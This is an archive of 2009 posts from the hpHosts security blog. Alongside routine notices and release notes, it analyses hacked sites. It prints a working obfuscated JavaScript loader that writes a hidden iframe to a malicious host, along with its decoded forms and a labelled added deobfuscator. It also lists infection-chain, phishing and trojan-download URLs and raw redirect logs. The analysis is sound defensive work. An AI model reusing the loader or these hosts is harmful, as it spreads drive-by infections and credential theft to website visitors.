Blog for hpHosts, and whatever else I feel like writing about ....

Monday, 31 August 2009

WARNING: malwarecrypt.com

Just a warning folks, it seems a squatter snatched malwarecrypt.com when it expired (no idea who the squatter is, as the WhoIs is hidden), before Jintan (the domain's previous owner) could renew it (his hosting company/registrar, A Small Orange (asmallorange.com), didn't warn him that it was due to expire).

He's contacted ASO to try and get it back. I'll let you know what happens.

Full Circle Magazine: Issue 28

Yes indeedy folks, here it is, Full Circle #28!

This month:

* Command and Conquer
* How-To : Program in Python – Part 2, LAMP Server – Part 1, Networking with SSHFS and Fast Internet With Squid.
* My Story – My Linux Experience I and II.
* My Opinion – AllMyApps
* Review – Tellico.
* MOTU Interview – Stephane Graber.
* Top 5 – SIP Clients.
* Ubuntu Women Interview, Ubuntu Games and all the usual goodness!

Read more
http://fullcirclemagazine.org/2009/08/30/full-circle-28-out-now/

Get it while it's hot!
http://fullcirclemagazine.org/issue-28/

Issues 0 - Current
http://fullcirclemagazine.org/downloads/

Forums:
http://ubuntuforums.org/forumdisplay.php?f=270

Wiki:
http://wiki.ubuntu.com/UbuntuMagazine

Saturday, 29 August 2009

Info: hpHosts server

Just a note folks, the hpHosts server is currently seeing abnormally high traffic, which slowed it down to a crawl. The server has been rebooted but is obviously still a lot slower than normal.

I won't have access to the server until tomorrow, so can't do very much at present.

Wednesday, 26 August 2009

Man beaten and stabbed by Gumtree scammers

Police today warned users of the popular classifieds website Gumtree to be on their guard after a man who responded to a car advert was almost killed in a brutal robbery.

On July 30 the 42-year-old took a large amount of cash to meet the supposed seller of a VW Golf in Barking, east London. He was punched, kicked and stabbed while trying to hold on to his bag, witnesses reported.

He was rushed to hospital for life-saving surgery.

It later emerged that the registered owner of the Golf had no idea it had been advertised for sale.


Read more
http://www.theregister.co.uk/2009/08/26/gumtree_warning/

Fix: Setup failed to install the required component Microsoft SQL Server 2005 Express

I received this error when trying to install the Business Contacts Manager that came with Microsoft Office Professional 2007.

After getting the exact same error when installing Microsoft Office Accounting 2009, I decided to try and find a fix again (didn't look much the first time as I don't really need Business Contacts Manager), and finally found one (thanks to NeilH10 in the MSDN Forums).

For those experiencing this, the following is what you need to do to resolve this;

1. Load Programs and Features (Windows Vista/Windows 7) or Add/Remove Programs (Windows XP or below)
2. Uninstall the following;

Microsoft SQL Server native client
Microsoft SQL Server Setup Support files
Microsoft SQL Server VSS writer

3. Delete or rename, the contents of the following folder

C:\Program Files\Microsoft SQL Server\

4. Re-run the installer for Business Contacts Manager (or whichever program's installer gave the error)

The above fix worked perfectly for me on Vista.

Surprisingly, I wasn't able to identify anything at all on the Microsoft site concerning this particular issue:

http://www.google.co.uk/search?hl=en&q=%22Setup+failed+to+install+the+required+component+Microsoft+SQL+Server+2005+Express%22+site%3Amicrosoft.com&meta=

Tuesday, 25 August 2009

Spambot Search Tool: v0.37a

I've got another SBST release for you. Forgot to change the version number from .37 to .38, so this one is .37a ;o)

Changes:

* Fixed MySQL view when there is less than 100 records
* Fixed fSpamlist query for check_spammers_plain.php (made a typo in the URL)
* Changed SFS link in web UI to stopforumspam/search (requested)
* Fixed BotScout query (I broke it in the previous version)

Download:
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Friday, 21 August 2009

Update: Network downtime

Just an update folks. The electricity board guys are here and have advised the electric is going to be off all day (this is going to be a nightmare ....), not just a couple of hours.

References:
http://hphosts.blogspot.com/2009/08/important-notice-of-downtime.html

Thursday, 20 August 2009

Spambot Search Tool v0.37

v0.37 has now been released and includes a re-written function for querying fSpamlist.

Note, as of this release, you will now be required to enter an API key to query the fSpamlist database. You can register for this at fspamlist.com.

Download
http://support.it-mate.co.uk/?mode=Products&p=spambotsearchtool

Please note: those using v0.35 or earlier will likely have already noticed that the fSpamlist query does not function, and those using 0.36 have until the end of September to upgrade to 0.37; that is the date the special temporary page I created (to give me time to re-write the fSpamlist queries) will be removed from the server.

IMPORTANT: Notice of downtime

Just a note folks, I've just been made aware of pending downtime that will be occurring when the electricity company comes to upgrade the circuits.

When is this occurring?

This will be occurring as of 0700 GMT August 21st.

How long will it last?

I do not currently know how long it will last, but estimates so far suggest the electricity board should be finished by 08:30, meaning the network should be back online around 0900 GMT.

Sites affected

*.mysteryfcm.co.uk
*.hosts-file.net
*.fspamlist.com
helenbenoist.co.uk
bughunter.it-mate.co.uk
pbone.it-mate.co.uk
hollmen.it-mate.co.uk

Other services affected

sGB - Mail server (i.e. new guestbook notifications, new registrations)
sURL - hpHosts access for querying blacklisted domains
Spambot Search Tool - fSpamlist queries
hpObserver - hpHosts queries

I've still got a mobile internet dongle and the laptop, so will update you if it is going to take any longer (I'll not know until the guy from the electric board tells me).

Wednesday, 19 August 2009

hpHosts: Mass removal

Just a note folks, I'm planning on having a new hpHosts release out within the next 6 hours or so, and after finishing the final round of validation (which lasted 7 days this time, instead of the usual 4-5), there are 4462 domains currently being removed from the database as I write this, due to their failing to resolve (they will continue to be monitored, just in case they spring back to life).

As always, the complete list is available in removed.txt, available via the hpHosts download page.

The Retro-Virus

Nowadays we see lots of malicious software that is designed to steal money and information. A new virus was recently discovered that seems to be all about proving a concept rather than blatant maliciousness.

The Win32/Induc.A virus does not infect like most viruses do. Delphi is a programming language. Induc infected the Delphi IDE so that when the programmers compile their programs the programs are already infected.

As far as we are able to determine at this time, this virus went undetected since April 2009. Most of the samples of infected files we have seen are other trojans, mainly those that steal bank information. So, we detected the Trojan, but didn’t know that it was also infected.

For the average user the virus is essentially harmless. The problem is that some software development companies use Delphi, got infected, and when we added detection for Win32/Induc.A their programs were detected. Some of these companies accused ESET of having false positives when their programs were actually infected!


Read more
http://www.eset.com/threat-center/blog/2009/08/19/the-retro-virus

Tuesday, 18 August 2009

Spambot Search Tool: Notice to all users

This is a notice to all those using the Spambot Search Tool. As of around a week or so ago, fSpamlist started requiring an API key for querying the fSpamlist database.

Obviously, because of this, the last SBST update included a new special URL to allow me time to convert the SBST over to the new API. This will obviously have meant that those that have still not upgraded to SBST v0.36 will not see normal functionality when it queries fSpamlist.

To stop me rambling, I'll get to the point. As of the next SBST update, you will be required to enter an API key before the SBST will query the FSL database (this will obviously require a change to config.php).

I'll post more on this in due course.

Monday, 17 August 2009

Alert: Alliance & Leicester botnet back ....

Alas it seems the Alliance and Leicester botnet has made a comeback.

www.mybank.alliance-leicester.co.uk.msfileid011.net/customerforms/server10a/form.asp/index.php?ct=mybank3926393725529332640321160295073361820577675979816&em=508xav@it-mate.co.uk

IPs it's resolving to thus far;

Given these appear to be the only IPs it's resolving to (sending additional DNS requests resulted in no additional IPs being detected), this is either a small group of friends or, more likely, just a very, very, very small botnet.

Sunday, 16 August 2009

Update: Google Webalizer exploits

Just an update on the previous blog. Gerhard (Clean-MX) and Anthony (MalwareURL) have also identified quite a few more compromised hosts;

http://www.malwaredomainlist.com/forums/index.php?topic=3230

And why am I not surprised to see Lunarpages customers in there (hat tip to Anthony ;o)). You'll no doubt remember the last blog on the LP subject.

http://hphosts.blogspot.com/2009/05/federal-reserve-goes-luckysploit.html

As was mentioned in the previous blog, the Lunarpages domains checked STILL contain the exploit code;

http://vurl.mysteryfcm.co.uk/?url=614296
PDF: vURL_Online_-_adammcgrath.ca_Results.pdf

This is now 4 months after Lunarpages were notified, and nothing seems to have been done to either clean up the affected domains, or prevent it happening again (as evidenced by the new ones that have turned up). The domains below, courtesy of Anthony at MalwareURL, show those affected at Lunarpages (and there's likely a lot more we've not yet identified).

Those I checked have an iFrame leading to microsotf.cn, which thankfully hasn't resolved since July 9th, or an iFrame leading to dakilfu.com (IP: 79.112.224.45 - 79-112-224-45.rdsnet.ro, RO-RCS-RDS-FIBERLINK - AS8708), which then loads 2 more iFrames to;

thestatsdata.com/static.php?q5432 - 89.149.251.84 (89-149-251-84.internetserviceteam.com, NetDirekt - AS28753)
seekandhide365.info/t.php - 79.112.224.45 (79-112-224-45.rdsnet.ro, RO-RCS-RDS-FIBERLINK - AS8708)

thestatsdata.com is returning a 500 error at present, but seekandhide365.info goes on to load several more iFrames from seekandhide365.info;

index.php?query=zinc+supplement&submit=Search
index.php?query=Money&submit=Search
index.php?query=trimed+pussy&submit=Search
index.php?query=oklahoma+real+estate&submit=Search
index.php?query=long+distance+mover&submit=Search
index.php?query=transplanting+banana+tree&submit=Search
index.php?query=Conjunctivitis&submit=Search
index.php?query=garage+door+prices&submit=Search


Along with 2 more from click.rontraffic.com (IP: 69.65.43.142, IPNAP (GigeNET - ECOMD));

click.rontraffic.com/re.php?hid=NDQyOTExMjN8fDEyNTA0OTM0NDN8fDIxMi41Ni45NS4yNTN8fHx8MXx8OXx8d2lyZWxlc3MgYWNjZXNzfHxncmltfHx8fDAuMDAwNHx8MC4wMDF8fGh0dHA6Ly93d3cuaGFuZHlzZWVrLmNvbS9qdW1wMS8/YWZmaWxpYXRlPTU2MDEmc3ViaWQ9NyZ0ZXJtcz13aXJlbGVzcyUyMGFjY2VzcyZzaWQ9WjIzMjA0MzczNyU0MCU0MFFNZmRETjVBRE55OFZNd1V6WDJFMlg0ODFNMFF6TTVRRE0xSVRNJmE9Z3ZjY2J2YWducGd2aXImbXI9MSZyYz0w


That lovely bit of Base64 decodes to;

44291123||1250493443||212.56.95.253||||1||19||wireless access||grim||||0.0004||0.004||http://141.pub.adfirmative.com/2.php?sid=141&keyword=wireless+access&goto=48372d52907a8f95baafd85e96e5a8b7-wsSfk3FkkF%09sws.SU.3S.sSF%092vvR%3A%2F%2Fnnn.NIIHjLo2qoIFUS.qLOt%2FNIjaE2.R2R%09R_aNfw%09wkw%09nqaIiINN%2BjEEINN%09QqYj4wS34%092vvR%3A%2F%2FHE.bQiNIjaE2.QqYj.EtQ%2FAqL%2FOqLon2jv.oii%3FEiqEHv2atWz2%260%3D4wS34%26b%3DOi6%3Bl1f2ZhD5NrN1LHbfyED1G5bOZva8VELeQE62Hh1FlS8hVEfkPnEtZYdm45ou68B97vk8G56W8jSxFSd8y53WNrZcWE4Tl2fbm5SPPnk97ONBwZueI8uypwuuuhjEWBkQQ%3BPtWRbwwrfqlEO%3BG25VVH2v4JbIlELvPRxlVnDRIWOuLnnTlEaXQYNwukcDFL6sm%3BPLPM48mBktyj3cIkF%24J%09f.ffk%09f%09w%09%09%09w%09GLqvIo+dqLzotQ%0985%09nnn.AiqLHb.Et.WH&objTimStr=0.58524400+1250493443


Which shows a connection to 141.pub.adfirmative.com (IP: 69.174.35.174 & 69.174.35.172 - LF Media, Inc MZIMA08-CUST-LEADSANDFEEDS01).

The fact they're still carrying the malicious code, however, irrespective of the fact that the target doesn't exist any more, means they should still be blacklisted, as there's nothing stopping those that hacked them in the first place from updating the code to point to new locations.


Ref:
http://hosts-file.net/misc/hpObserver_-_Lunarpages.html

Google: Webalizer exploits gone wild!

Okay, so the title may be weird, but it sounded good and a little appropriate given both are involved (albeit one indirectly). I came across these whilst researching something else, and thought I'd give it a mention.

In short, as shown in the screenshot, these show a slew of sites that appear to have had Webalizer exploited, with some lovely little exploits put on the sites for unwitting victims that happen to visit. Chances are these will possibly load on the sites themselves, regardless of the URL used, if Webalizer files are referenced, but that's pure speculation as I've not checked.

When visiting one of the sites, for example;

dreisbachmotors.com/webalizer/050709wareza/index.html

You see (if you look at the source code), a .js file (images/counter.js) being loaded;

Ref: http://vurl.mysteryfcm.co.uk/?url=813701
Cache (PDF): http://hosts-file.net/misc/dreisbachmotors_com/dreisbachmotors_com.pdf

counter.js then goes on to load yet another site, this time autosloansonlines.com (IP: 89.149.242.190 - php6.nasza-klasa.pl, NetDirekt - AS28753). This then loads yet another site for us;

http://vurl.mysteryfcm.co.uk/?url=813731

The site loaded, 3gp-blogline.com (IP: 89.149.242.190 - php6.nasza-klasa.pl), then goes on to load yak.jpg at autoloansonlines.com, which, as you've no doubt guessed, isn't a jpg at all, but more JavaScript;

a=new Array(3600,13225,9801,12996,11025,12544,13456,
3844,13924,9409,12996,1024,13225,12321,13689,12996,
9801,10201,1024,3721,1156,3721,11236,10609,13225,9604,
12100,10404,1089,13456,13225,10000,3844,1225,11025,13689,
13689,12769,3481,2304,2304,2704,10816,12769,2116,9801,11881,
12544,10816,11881,11236,12321,10404,2209,10000,12544,12100,
2304,2809,2401,2704,2304,11236,12321,2209,10000,10816,11236,
4096,2601,2401,1225,1089,14400,11236,10201,13689,11025,3844,
2500,2401,1089,11025,10404,11236,10816,11025,13689,3844,2500,
2500,2601,1089,13456,13689,14884,11881,10404,3844,1225,14161,
11236,13456,11236,9801,11236,11881,11236,13689,14884,3481,1089,
11025,11236,10201,10201,10404,12321,1225,3969,3721,2304,11236,
10609,13225,9604,12100,10404,3969,1156,3481,1024,13924,9409,12996,
1024,12996,10201,13225,13689,11664,13456,1024,3721,1024,1156,1156,
3481,1024,169,100,10404,12321,12996,1600,13924,9409,12996,1024,
11025,3721,2304,3481,11025,3600,13225,12321,13689,12996,9801,10201,
2116,11664,10201,12100,10609,13456,10816,3481,11025,1849,1849,1681,
1024,12996,10201,13225,13689,11664,13456,1849,3721,6889,13456,12996,
11025,12100,10609,2116,10404,12996,12321,11881,4489,10816,9409,
12996,4489,12321,10000,10201,1600,13225,12321,13689,12996,9801,
10201,2116,9801,10816,9409,12996,4489,12321,10000,10201,4225,13456,
1600,11025,1681,2025,2401,1681,3481,1024,169,100,10000,12321,9801,
13689,11881,10201,12100,13456,2116,14161,12996,11025,13456,10201,
1600,12996,10201,13225,13689,11664,13456,1681,3481,1024,3600,2209,
13225,9801,12996,11025,12544,13456,3844);for(var p in a){document.write(String.fromCharCode(Math.sqrt(a[p])));};


Which decodes to;

<script>var source ="=jgsbnf!tsd>#iuuq;004hq.cmphmjof/dpn05140jo/dhj@31#!xjeui>21!ifjhiu>223!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";

for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);

document.write(result); </script>


Which decodes to;

<iframe src="http://3gp-blogline.com/403/in.cgi?20" width=10 height=112 style="visibility: hidden"></iframe>
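The two stages above can be reversed statically, without letting either stage run in a browser. The following is an added example (JavaScript, not code from the original post): it takes the number array from the yak.jpg snippet, undoes the square-root stage, pulls the `source` string out of the result, undoes the minus-one shift, and ends at the hidden iframe and its target.

```javascript
// Added example (not from the original post): static deobfuscator for the
// two-stage yak.jpg loader. Nothing is eval'd or written to the DOM.
// YAK_JPG_ARRAY is copied from the page's snippet: each element is the
// square of a character code.
const YAK_JPG_ARRAY = [
  3600,13225,9801,12996,11025,12544,13456,
  3844,13924,9409,12996,1024,13225,12321,13689,12996,
  9801,10201,1024,3721,1156,3721,11236,10609,13225,9604,
  12100,10404,1089,13456,13225,10000,3844,1225,11025,13689,
  13689,12769,3481,2304,2304,2704,10816,12769,2116,9801,11881,
  12544,10816,11881,11236,12321,10404,2209,10000,12544,12100,
  2304,2809,2401,2704,2304,11236,12321,2209,10000,10816,11236,
  4096,2601,2401,1225,1089,14400,11236,10201,13689,11025,3844,
  2500,2401,1089,11025,10404,11236,10816,11025,13689,3844,2500,
  2500,2601,1089,13456,13689,14884,11881,10404,3844,1225,14161,
  11236,13456,11236,9801,11236,11881,11236,13689,14884,3481,1089,
  11025,11236,10201,10201,10404,12321,1225,3969,3721,2304,11236,
  10609,13225,9604,12100,10404,3969,1156,3481,1024,13924,9409,12996,
  1024,12996,10201,13225,13689,11664,13456,1024,3721,1024,1156,1156,
  3481,1024,169,100,10404,12321,12996,1600,13924,9409,12996,1024,
  11025,3721,2304,3481,11025,3600,13225,12321,13689,12996,9801,10201,
  2116,11664,10201,12100,10609,13456,10816,3481,11025,1849,1849,1681,
  1024,12996,10201,13225,13689,11664,13456,1849,3721,6889,13456,12996,
  11025,12100,10609,2116,10404,12996,12321,11881,4489,10816,9409,
  12996,4489,12321,10000,10201,1600,13225,12321,13689,12996,9801,
  10201,2116,9801,10816,9409,12996,4489,12321,10000,10201,4225,13456,
  1600,11025,1681,2025,2401,1681,3481,1024,169,100,10000,12321,9801,
  13689,11881,10201,12100,13456,2116,14161,12996,11025,13456,10201,
  1600,12996,10201,13225,13689,11664,13456,1681,3481,1024,3600,2209,
  13225,9801,12996,11025,12544,13456,3844,
];

// Stage 1: sqrt() each element and map it back to a character. A value that
// is not a perfect square means the sample uses a different scheme, so fail
// loudly instead of emitting garbage.
function decodeSquaredCharCodes(values) {
  let out = '';
  for (const v of values) {
    const root = Math.sqrt(v);
    if (!Number.isInteger(root)) throw new Error(`not a perfect square: ${v}`);
    out += String.fromCharCode(root);
  }
  return out;
}

// Pull the obfuscated string literal out of the stage-2 script without running it.
function extractSourceLiteral(script) {
  const m = /var\s+source\s*=\s*"([^"]*)"/.exec(script);
  if (!m) throw new Error('no `var source = "..."` literal found in stage 2');
  return m[1];
}

// Stage 2 applies charCodeAt(i) - 1 to every character; delta = -1 reverses it.
function shiftChars(s, delta) {
  let out = '';
  for (let i = 0; i < s.length; i++) {
    out += String.fromCharCode(s.charCodeAt(i) + delta);
  }
  return out;
}

// Read the src attribute off the hidden iframe the last stage would write.
function extractIframeSrc(html) {
  const m = /<iframe[^>]*\ssrc\s*=\s*"([^"]+)"/i.exec(html);
  return m ? m[1] : null;
}

// Whole pipeline: squared codes -> stage-2 script -> iframe markup -> target URL.
function deobfuscateYakJpg(values) {
  const stage2 = decodeSquaredCharCodes(values);
  const iframe = shiftChars(extractSourceLiteral(stage2), -1);
  return { stage2, iframe, src: extractIframeSrc(iframe) };
}

const result = deobfuscateYakJpg(YAK_JPG_ARRAY);
console.log(result.iframe);        // the hidden 10x112 iframe markup
console.log('loads:', result.src);
```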


This then redirects to;

extex-events.ru/temp/ (IP: 80.90.114.11, SmartLogic Ltd., Russia)

In this particular case, it didn't seem to go any further. However, checking one of the others, led me through;

jkk.tw/in.cgi?5&parameter=jkk (IP: 213.163.84.28, Serverboost IP space)
rmi.tw/in.cgi?6 (IP: 213.163.84.28, Serverboost IP space)
blt.kz/1/show.php?s=5015ba5606 (IP: 213.163.84.28, Serverboost IP space)
blt.kz/1/url=about:blank (IP: 213.163.84.28, Serverboost IP space)



This decodes to further obfuscated JS. A more readable version of the decoded JS is available at (couldn't post it here obviously as it would send the AVs flying):
http://wepawet.cs.ucsb.edu/view.php?hash=044a1831bdc8b81eae428c16fb3123b0&type=js

Which serves up the payload (in this case a credential stealing trojan - how nice!) from;

blt.kz/1/load.php?e=6
VT: http://www.virustotal.com/analisis/0b119b14f5acc63cd18a42b64b4c88da27c70af1e8c4af3dd8322228854fe872-1250346350
TE: http://www.threatexpert.com/report.aspx?md5=3ff5ae22e70e8d26923fda7ad3a9e46d

If you've already been to the above, you're either served up the fake 404 without the additional exploit code, or it redirects to the following, which sadly 404s for me;

online358.net/work/show.php (IP: 195.88.190.240 Bigness group Ltd. Network, Russia)

Affected sites as currently listed in Google;


Ref:
http://hosts-file.net/misc/hpObserver_-_Webalizer_exploits.html

Wednesday, 12 August 2009

Yet more blackhat SEO from the Internet Service Team and NetDirekt

Following on from the previous documentation on the blackhat SEO campaigns going on in the search engines at present, I've noticed over the past few weeks that those I previously documented, using filenames such as cadets.php with the .js file, were mysteriously leading to 404 pages.

Thankfully (or disappointingly, depending on which way you want to look at it), they're still making it super easy to identify their malicious domains, such as the following for example;

Host: received-latest-microsoft-update.alk.stromiko.com
Current IP: 95.168.191.96
IP PTR: 95.168.191.96.internetserviceteam.com

You'll no doubt have noticed our dear friends at the IST, or missed the fact that whilst the IP range is registered to V3SERVERS-NET-967806 (v3servers.net), it also just so happens to be on the NetDirekt AS - coinkydink? I don't think so.

Getting back to it. Feed this domain a Google referer (I've not tested it, but am 99% sure it'll also work if you feed it a Bing, Live or Yahoo etc referer too), and you're taken to triwoperl.com (IP: 95.168.191.19 - 95.168.191.19.internetserviceteam.com), which looks like an ordinary search page.


Alas, however, as you'll no doubt have guessed, you're not actually taken to the domains it claims you'll be taken to. Nope, instead, you're taken through;

GET /feed/click.php?u=... HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: triwoperl.com
Connection: Keep-Alive
Cookie: cook_aff=19362; cook_saff=200

HTTP/1.1 302 Found
Server: nginx/0.7.61
Date: Wed, 12 Aug 2009 14:01:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 12 Aug 2009 14:01:33 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: http://208.94.233.40/go.php?data=s5nKz1t63pi2a7chRizVwNj8R5tL66n%2FJSqSrEyE5Ds1XHySf%2FBEKbKrPXRQ0ZnLPxx4blfV%2Bn8%2FSopcE6QUBHlnc892LbyqO0P40I0VVTOOcnyhWEOS%2BWYdqmv%2FDQATc998YKsxMpdTLX2I97MhU4EBnY8viphjQJgBhrkhZHbvAgilHGlaq00LydOf%2BAA6qtzMRttY7LY%2FnAC%2FrSDqTbsoA7CSDb4pPB6qZpCmg2GWLOunoAXICFv%2F2kiYKpLt%2BsQ%2Fwo%2BOzOgu2%2BV3yAPMYi9pUXSIzS1jQQs1mXbypFKuaaN8g9kEZ8VTZ9TZrM%2BPkzpm1qL2vLJ5%2Fxdm6I%2B4yVO6jRKd%2BKStcllBj5ESBkTxBxhu29BKCh%2FoINGbx8%2BqmtyGewysJmVsbMlAkV8OgfL7q8P6Kv09icZITfllUxOa0uuYuLFDOOYpaLX%2Binjcwg5%2Bve2%2B5bcein9VhhV7bThTdH8vBZMFAsXwLc2C%2BaOBerxBXw6nO9obFwhqkrlTgAdcQWiOuaP2KGEZQqhAwQLfrUeNsqyR4lMbfsLpfHxAPLUEbN1CmnSzF8POjbopvPMLNexE0z9DmJPtfs9dcnA7zjvapIMA38gA7Im5ky27yUlMW%2FBrJKEd4xViu45L6Y8ZuVN6l1zJ5JBPkuEneIc2Fct21KbWwwWZlMsFiJpwG4SQtEAlu6WVbFRhMAIKli7pcle%2F%2FzcNQKK9LwAamk86hkutnNlRlkXndh3eKlz3rW21mevjHZSwapnyjpvgei3T2aU5I9UdP5hpmeAIvK4%2FS5zxE5jhzqAa4RyMMHKZAJ2Sv1NXO2b1vTKeG%2BxrU%2FnInpvlFnx7TF0CLJl6QK%2ByBWqpoX6%2FBFQ6dBxLcu5fHMP7RBzV5Y7RIGjPkh5nmEt1qxBKBCrzscmLEwsp3tYY9VSSCqQz
Content-Length: 0

------------------------------------------------------------------
GET /go.php?data=s5nKz1t63pi2a7chRizVwNj8R5tL66n%2FJSqSrEyE5Ds1XHySf%2FBEKbKrPXRQ0ZnLPxx4blfV%2Bn8%2FSopcE6QUBHlnc892LbyqO0P40I0VVTOOcnyhWEOS%2BWYdqmv%2FDQATc998YKsxMpdTLX2I97MhU4EBnY8viphjQJgBhrkhZHbvAgilHGlaq00LydOf%2BAA6qtzMRttY7LY%2FnAC%2FrSDqTbsoA7CSDb4pPB6qZpCmg2GWLOunoAXICFv%2F2kiYKpLt%2BsQ%2Fwo%2BOzOgu2%2BV3yAPMYi9pUXSIzS1jQQs1mXbypFKuaaN8g9kEZ8VTZ9TZrM%2BPkzpm1qL2vLJ5%2Fxdm6I%2B4yVO6jRKd%2BKStcllBj5ESBkTxBxhu29BKCh%2FoINGbx8%2BqmtyGewysJmVsbMlAkV8OgfL7q8P6Kv09icZITfllUxOa0uuYuLFDOOYpaLX%2Binjcwg5%2Bve2%2B5bcein9VhhV7bThTdH8vBZMFAsXwLc2C%2BaOBerxBXw6nO9obFwhqkrlTgAdcQWiOuaP2KGEZQqhAwQLfrUeNsqyR4lMbfsLpfHxAPLUEbN1CmnSzF8POjbopvPMLNexE0z9DmJPtfs9dcnA7zjvapIMA38gA7Im5ky27yUlMW%2FBrJKEd4xViu45L6Y8ZuVN6l1zJ5JBPkuEneIc2Fct21KbWwwWZlMsFiJpwG4SQtEAlu6WVbFRhMAIKli7pcle%2F%2FzcNQKK9LwAamk86hkutnNlRlkXndh3eKlz3rW21mevjHZSwapnyjpvgei3T2aU5I9UdP5hpmeAIvK4%2FS5zxE5jhzqAa4RyMMHKZAJ2Sv1NXO2b1vTKeG%2BxrU%2FnInpvlFnx7TF0CLJl6QK%2ByBWqpoX6%2FBFQ6dBxLcu5fHMP7RBzV5Y7RIGjPkh5nmEt1qxBKBCrzscmLEwsp3tYY9VSSCqQz HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: 208.94.233.40
Connection: Keep-Alive

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 14:01:34 GMT
Server: Apache
Set-Cookie: gkv-=1; expires=Thu, 13-Aug-2009 14:01:34 GMT
Set-Cookie: bkv-=1; expires=Tue, 11-Aug-2009 14:01:34 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 12 Aug 2009 14:01:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Location: /go.php?data=s5nKz1t63pi2a7chRizVwNj8R5tL66n%2FJSqSrEyE5Ds1XHySf%2FBEKbKrPXRQ0ZnLPxx4blfV+n8%2FSopcE6QUBHlnc892LbyqO0P40I0VVTOOcnyhWEOS+WYdqmv%2FDQATc998YKsxMpdTLX2I97MhU4EBnY8viphjQJgBhrkhZHbvAgilHGlaq00LydOf+AA6qtzMRttY7LY%2FnAC%2FrSDqTbsoA7CSDb4pPB6qZpCmg2GWLOunoAXICFv%2F2kiYKpLt+sQ%2Fwo+OzOgu2+V3yAPMYi9pUXSIzS1jQQs1mXbypFKuaaN8g9kEZ8VTZ9TZrM+Pkzpm1qL2vLJ5%2Fxdm6I+4yVO6jRKd+KStcllBj5ESBkTxBxhu29BKCh%2FoINGbx8+qmtyGewysJmVsbMlAkV8OgfL7q8P6Kv09icZITfllUxOa0uuYuLFDOOYpaLX+injcwg5+ve2+5bcein9VhhV7bThTdH8vBZMFAsXwLc2C+aOBerxBXw6nO9obFwhqkrlTgAdcQWiOuaP2KGEZQqhAwQLfrUeNsqyR4lMbfsLpfHxAPLUEbN1CmnSzF8POjbopvPMLNexE0z9DmJPtfs9dcnA7zjvapIMA38gA7Im5ky27yUlMW%2FBrJKEd4xViu45L6Y8ZuVN6l1zJ5JBPkuEneIc2Fct21KbWwwWZlMsFiJpwG4SQtEAlu6WVbFRhMAIKli7pcle%2F%2FzcNQKK9LwAamk86hkutnNlRlkXndh3eKlz3rW21mevjHZSwapnyjpvgei3T2aU5I9UdP5hpmeAIvK4%2FS5zxE5jhzqAa4RyMMHKZAJ2Sv1NXO2b1vTKeG+xrU%2FnInpvlFnx7TF0CLJl6QK+yBWqpoX6%2FBFQ6dBxLcu5fHMP7RBzV5Y7RIGjPkh5nmEt1qxBKBCrzscmLEwsp3tYY9VSSCqQz&an=1&f=1
Content-Length: 0
Connection: close
Content-Type: text/html

------------------------------------------------------------------
GET /go.php?data=s5nKz1t63pi2a7chRizVwNj8R5tL66n%2FJSqSrEyE5Ds1XHySf%2FBEKbKrPXRQ0ZnLPxx4blfV+n8%2FSopcE6QUBHlnc892LbyqO0P40I0VVTOOcnyhWEOS+WYdqmv%2FDQATc998YKsxMpdTLX2I97MhU4EBnY8viphjQJgBhrkhZHbvAgilHGlaq00LydOf+AA6qtzMRttY7LY%2FnAC%2FrSDqTbsoA7CSDb4pPB6qZpCmg2GWLOunoAXICFv%2F2kiYKpLt+sQ%2Fwo+OzOgu2+V3yAPMYi9pUXSIzS1jQQs1mXbypFKuaaN8g9kEZ8VTZ9TZrM+Pkzpm1qL2vLJ5%2Fxdm6I+4yVO6jRKd+KStcllBj5ESBkTxBxhu29BKCh%2FoINGbx8+qmtyGewysJmVsbMlAkV8OgfL7q8P6Kv09icZITfllUxOa0uuYuLFDOOYpaLX+injcwg5+ve2+5bcein9VhhV7bThTdH8vBZMFAsXwLc2C+aOBerxBXw6nO9obFwhqkrlTgAdcQWiOuaP2KGEZQqhAwQLfrUeNsqyR4lMbfsLpfHxAPLUEbN1CmnSzF8POjbopvPMLNexE0z9DmJPtfs9dcnA7zjvapIMA38gA7Im5ky27yUlMW%2FBrJKEd4xViu45L6Y8ZuVN6l1zJ5JBPkuEneIc2Fct21KbWwwWZlMsFiJpwG4SQtEAlu6WVbFRhMAIKli7pcle%2F%2FzcNQKK9LwAamk86hkutnNlRlkXndh3eKlz3rW21mevjHZSwapnyjpvgei3T2aU5I9UdP5hpmeAIvK4%2FS5zxE5jhzqAa4RyMMHKZAJ2Sv1NXO2b1vTKeG+xrU%2FnInpvlFnx7TF0CLJl6QK+yBWqpoX6%2FBFQ6dBxLcu5fHMP7RBzV5Y7RIGjPkh5nmEt1qxBKBCrzscmLEwsp3tYY9VSSCqQz&an=1&f=1 HTTP/1.1
Accept: */*
Referer: http://triwoperl.com/feed/search.php?q=hphosts&aff=19362&saff=200
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; Avant Browser; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)
Host: 208.94.233.40
Connection: Keep-Alive
Cookie: gkv-=1

HTTP/1.1 302 Found
Date: Wed, 12 Aug 2009 14:01:34 GMT
